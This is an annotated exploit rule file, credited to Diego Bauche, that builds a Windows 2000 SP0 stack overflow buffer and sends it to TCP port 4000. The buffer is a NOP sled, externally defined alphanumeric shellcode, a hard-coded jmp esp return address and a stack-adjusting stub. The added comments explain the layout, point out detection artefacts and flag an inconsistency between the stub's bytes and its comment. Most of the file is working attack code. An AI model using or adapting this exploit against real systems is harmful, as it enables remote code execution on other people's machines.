# Some rule to exploit a win32 stack overrun example.
# Diego Bauche
#
# Builds a single fixed-layout overflow buffer and writes it to TCP port 4000:
# NOP padding, shellcode, a random dword, the overwritten return address, a
# short NOP tail and a 9-byte stub. Every offset and the return address are
# hard-coded, so the buffer only matches the exact target build named in the
# comment below; any other build, or address randomisation, makes it miss.
# From a detection standpoint the long runs of 0x90 and the fixed
# 0x77e822ea return address are the obvious artefacts on the wire.

# Shellcode is taken from a variable defined outside this rule; nothing here
# shows its length or encoding (the name suggests alphanumeric-only bytes).
var shellcode = $win32_alnum_scode
# Presumably the number of NOPs needed so that padding + shellcode totals
# 1032 bytes -- %length(1032-$shellcode) reads as "1032 minus the shellcode
# length"; confirm against the interpreter's definition of %length.
var nops_len = %length(1032-$shellcode)
# [\x90x$n] looks like repetition syntax: $n copies of 0x90 (x86 NOP).
var nops_first = [\x90x$nops_len]
var nops_last = [\x90x36]

# jmp esp - windows 2000 sp0
# Absolute address of a jmp esp gadget, valid only for that build. The |...|
# form presumably emits it as a little-endian dword -- verify in the tool.
var eip = |77e822ea|

# Nasty, sub sp, 400 - jmp esp
# Raw x86 bytes: 66 81 ec 02 04 is sub sp, imm16 with imm16 = 0x0402 (not
# 0x400 as the comment above says -- TODO confirm which was intended),
# 8b ec is mov ebp, esp and ff e4 is jmp esp. Presumably this moves esp back
# down into the earlier padding so execution reaches the shellcode.
var jump_back = 0x66,0x81,0xec,0x02,0x04,0x8b,0xec,0xff,0xe4

# Buffer layout, in order: NOPs, shellcode, random dword (presumably 4 bytes
# of filler whose contents do not matter), return address, 36 NOPs, the
# jump_back stub. What the random dword overwrites is not visible here.
var payload = $nops_first,$shellcode,%random:dword(),$eip,$nops_last,$jump_back

# Delivery: write the buffer to the peer on 4000/tcp. `options=` is empty
# and may be truncated in this copy of the rule.
port=4000/tcp
peer write: $payload
options=